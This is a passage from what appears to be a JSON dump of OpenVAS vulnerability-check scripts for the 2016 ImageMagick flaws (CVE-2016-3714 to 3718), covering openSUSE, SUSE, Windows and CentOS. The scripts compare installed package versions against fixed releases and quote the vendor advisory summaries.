for ImageMagick (openSUSE-SU-2016:1266-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n 
(potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n\n - Use external svg loader (rsvg)\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1266-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", 
rpm:\"ImageMagick-devel~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra\", rpm:\"ImageMagick-extra~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra-debuginfo\", rpm:\"ImageMagick-extra-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3\", rpm:\"libMagick++-6_Q16-3~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo\", rpm:\"libMagick++-6_Q16-3-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel\", rpm:\"libMagick++-devel~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick\", rpm:\"perl-PerlMagick~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick-debuginfo\", rpm:\"perl-PerlMagick-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel-32bit\", rpm:\"ImageMagick-devel-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-32bit\", rpm:\"libMagick++-6_Q16-3-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo-32bit\", rpm:\"libMagick++-6_Q16-3-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel-32bit\", rpm:\"libMagick++-devel-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-32bit\", rpm:\"libMagickCore-6_Q16-1-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-1-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-32bit\", rpm:\"libMagickWand-6_Q16-1-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickWand-6_Q16-1-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:26:09", "description": "The host is installed with ImageMagick\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-05T00:00:00", "type": "openvas", "title": "ImageMagick Multiple Vulnerabilities May16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": 
"2019-07-05T00:00:00", "id": "OPENVAS:1361412562310807568", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807568", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ImageMagick Multiple Vulnerabilities May16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:imagemagick:imagemagick\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807568\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-05 14:06:00 +0530 (Thu, 05 May 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"ImageMagick Multiple Vulnerabilities May16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed 
with ImageMagick\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - Insufficient filtering for filename passed to delegate's command.\n\n - An error in ImageMagick's ephemeral pseudoprotocol.\n\n - An error in ImageMagick's msl pseudo protocol.\n\n - An error in ImageMagick's label pseudo protocol.\n\n - An SSRF vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code, to delete arbitrary files, to move image\n files to file with any extension in any folder, to get content of the files\n from the server.\");\n\n script_tag(name:\"affected\", value:\"ImageMagick versions before 6.9.3-10\n and 7.x before 7.0.1-1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ImageMagick version\n 6.9.3-10 or 7.0.1-1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/05/03/18\");\n script_xref(name:\"URL\", value:\"https://imagetragick.com\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_imagemagick_detect_win.nasl\");\n script_mandatory_keys(\"ImageMagick/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!imVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:imVer, test_version:\"6.9.3.10\"))\n{\n fix = \"6.9.3.10\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:imVer, test_version:\"7.0.0\", test_version2:\"7.0.1.0\"))\n{\n fix = \"7.0.1.1\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 
report_fixed_ver(installed_version:imVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:36", "description": "The remote host is missing an update for the 'ImageMagick' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2016-05-08T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for ImageMagick (SUSE-SU-2016:1260-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851307", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851307", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851307\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:24 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for ImageMagick (SUSE-SU-2016:1260-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n 
pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n\n - Use external svg loader (rsvg)\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1260-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3\", rpm:\"libMagick++-6_Q16-3~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo\", rpm:\"libMagick++-6_Q16-3-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-32bit\", rpm:\"libMagickCore-6_Q16-1-32bit~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-1-debuginfo-32bit~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~19.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n 
} else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:06", "description": "Check the version of ImageMagick", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "CentOS Update for ImageMagick CESA-2016:0726 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882483", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882483", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ImageMagick CESA-2016:0726 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882483\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:32 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ImageMagick CESA-2016:0726 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of ImageMagick\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple image\nformats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. 
(CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. 
Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021865.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.2.7~4.el6_7\", rls:\"CentOS6\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:06", "description": "Check the version of ImageMagick", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "CentOS Update for ImageMagick CESA-2016:0726 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882484", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882484", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ImageMagick CESA-2016:0726 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882484\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:37 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ImageMagick CESA-2016:0726 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ImageMagick\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple\nimage formats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. 
(CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. 
